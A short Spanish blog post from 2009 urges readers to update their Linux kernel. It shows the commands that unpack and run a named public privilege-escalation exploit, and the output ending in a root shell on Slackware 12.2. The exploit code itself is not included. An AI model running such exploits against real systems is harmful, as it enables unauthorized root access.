analytics

miércoles, 26 de agosto de 2009

Actuliza tu kernel, cualquiera puede ser root

Recientemente salio un bug en el kernel de linux que podría alguien entrar al sistema con permisos de root, bien pues he probado este fallo con una Slackware 12.2 con el kernel: 2.6.27.7 y lo revienta en 3 segundos más o menos.

Esto quiero que quede claro que es con fines educativos. El software lo encontre con el nombre wunderbar_emporium. Los pasos como siempre descomprimimos:
#tar xvf wunderbar_emporium.tgz

Y ejecutamos el .sh
# ./wunderbar_emporium.sh
[+] MAPPED ZERO PAGE!
[+] got ring0!
[+] detected 2.6 style 8k stacks
sh: mplayer: command not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
sh-3.1#

La gracia de esto es que lo proveis siendo un usuario sin privilegios.
Publicado por en
Etiquetas:

1 comentario:

  1. Como parchear el kernel | Linuxadmin3 de noviembre de 2009, 14:37

    [...] por ismaelrubio el Noviembre 03, 2009 General Algo que hay que hacer para evitar cosas como, fallos de seguridad, nuevas funcionalidades y demás menesteres. Es un proceso sencillo que cualquiera puede [...]

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)